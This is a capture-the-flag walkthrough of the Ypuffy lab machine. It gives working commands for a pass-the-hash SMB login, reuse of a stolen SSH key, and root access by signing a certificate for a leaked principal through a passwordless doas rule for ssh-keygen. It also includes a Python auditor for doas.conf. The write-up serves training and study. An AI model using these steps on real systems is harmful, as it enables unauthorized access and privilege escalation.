Ypuffy - WriteUp
Let’s start with nmap. But let’s spice it up a bit with an additional script:
nmap -sC -sV -oN initial --script discovery 10.10.10.107
The output is quite big. You can see the full output here.
The script tries to get as much information as possible about your target. In this case it shows some LDAP information and the following open ports:
22, 80, 139, 389, 445
The sambaNTPassword hash immediately caught my attention, as this is very juicy information. I paused my enumeration and tried to exploit it. But how?
Password hashes are often used as a substitute for passwords, which means you don’t need the original password to authenticate to a service; the hash alone is enough. This is how your corporate single-sign-on stuff works, otherwise you would have to log in every time. So it’s a convenience thing.
The method is called Pass-The-Hash, and of course there are tools out there that help you with this, like pth-smbclient. If you don’t have it, just go to GitHub and get the
After fiddling around with the options, the syntax and where to connect to, I managed to connect to alice’s share:
pth-smbclient --user=alice1978 --pw-nt-hash -m smb3 \\\\10.10.10.107\\alice 0B186E661BBDBDCF6047784DE8B9FD8B
And we find a private key in “ppk” format.
After downloading the file and trying to use it as a key to access ssh, I got an error: this format is not compatible with ssh, so I tried converting it. A quick Google search helped me find the correct command for this task. But first we need to install putty-tools.
puttygen my_private_key.ppk -O private-openssh -o id_rsa
mv id_rsa ~/.ssh/
chmod 600 ~/.ssh/id_rsa
ssh -i ~/.ssh/id_rsa alice1978@10.10.10.107
As you can see in the screenshot, a simple ls gives us “user.txt”.
uname -a reveals a BSD box, which was quite handy: shortly after this box was released, an exploit for the Xorg component of most BSD boxes was published. It’s a local privesc that gives you root access.
This is something you only get by googling or by being up-to-date with infosec news.
This was the route I took to root the box.
However, the intended method was a bit more tricky. While searching the directory structure I noticed a folder “userca”.
“CA” in this context mostly means “Certificate Authority” and exists to sign certificates or issue new keys, for example for ssh.
Furthermore, BSD has doas, its equivalent of sudo. Let’s check what we can do on this box.
ypuffy$ cat /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
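Reading rules like this by hand is error-prone, so here is an added Python helper (not part of the original write-up) that parses doas.conf and reports every nopass rule, noting when the permitted command may take arbitrary arguments, which is exactly what makes the ssh-keygen rule above dangerous. The sample configuration is constructed and modelled on the rule found on the box.

```python
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample, modelled on the box's /etc/doas.conf plus two extra rules
DOAS_CONF = """\
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
permit nopass bob cmd /usr/bin/ssh-keygen args -l
deny alice1978 as root
"""
OPTIONS = {"nopass", "nolog", "persist", "keepenv", "setenv"}

@dataclass
class Rule:
    action: str                      # permit / deny
    options: Set[str]
    identity: str                    # user or :group
    target: str = "root"             # doas defaults "as" to root
    cmd: Optional[str] = None        # None => any command
    args: Optional[List[str]] = None # None => any arguments allowed

def parse_doas(text: str) -> List[Rule]:
    """Parse doas.conf grammar: action [options] identity [as target] [cmd c [args ...]]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        words = line.split()
        action, rest = words[0], words[1:]
        options: Set[str] = set()
        while rest and rest[0] in OPTIONS:
            opt = rest.pop(0)
            if opt == "setenv":      # skip the "{ VAR ... }" group
                while rest and rest.pop(0) != "}":
                    pass
            else:
                options.add(opt)
        rule = Rule(action, options, rest.pop(0))
        if rest and rest[0] == "as":
            rule.target, rest = rest[1], rest[2:]
        if rest and rest[0] == "cmd":
            rule.cmd, rest = rest[1], rest[2:]
        if rest and rest[0] == "args":
            rule.args = rest[1:]     # "args" alone means: no arguments allowed
        rules.append(rule)
    return rules

def findings(rules: List[Rule]) -> List[str]:
    """Report permit rules that need no password; unrestricted args are the red flag."""
    out = []
    for r in rules:
        if r.action != "permit" or "nopass" not in r.options:
            continue
        how = "with ANY arguments" if r.args is None else f"with args {r.args}"
        out.append(f"{r.identity} -> {r.target}: {r.cmd or 'any command'} {how}, no password")
    return out
```

For the rule on the box this reports that alice1978 may run ssh-keygen as userca with any arguments, which is the same as handing her the CA's signing key.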
We indeed can run ssh-keygen. But when we try, we are prompted for a password. Let’s dig deeper into the ssh route.
There’s a password somewhere for sure.
ypuffy$ cat sshd_config
[...]
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
So, apparently sshd issues a curl request to a local web service to look up the principals for the user logging in. I guess, not sure what happens here. I still need to look this up…
Let’s step back and catch up with the Xorg exploit first. It’s fairly easy to use: just get it from Exploit-DB and make it executable with chmod +x.
Let’s get back to the curl command and check what we can do with it:
ypuffy$ /usr/local/bin/curl "http://127.0.0.1/sshauth?type=principals&username=root"
3m3rgencyB4ckd00r
For whatever reason we get this string back: 3m3rgencyB4ckd00r, obviously the missing password.
Let’s create a key and try signing it.
ypuffy$ ssh-keygen -t rsa
ypuffy$ mv id_rsa.pub /tmp
ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I "algo" -z 1 id_rsa.pub
Signed user key id_rsa-cert.pub: id "algo" serial 1 for 3m3rgencyB4ckd00r valid forever
ypuffy$ cp id_rsa-cert.pub /home/alice1978/.ssh/
This seems to work so far. But can we login now?
ypuffy$ ssh root@localhost
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
ypuffy# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
ypuffy# ls
root.txt
This is it. We got the box. =)
See ya next time!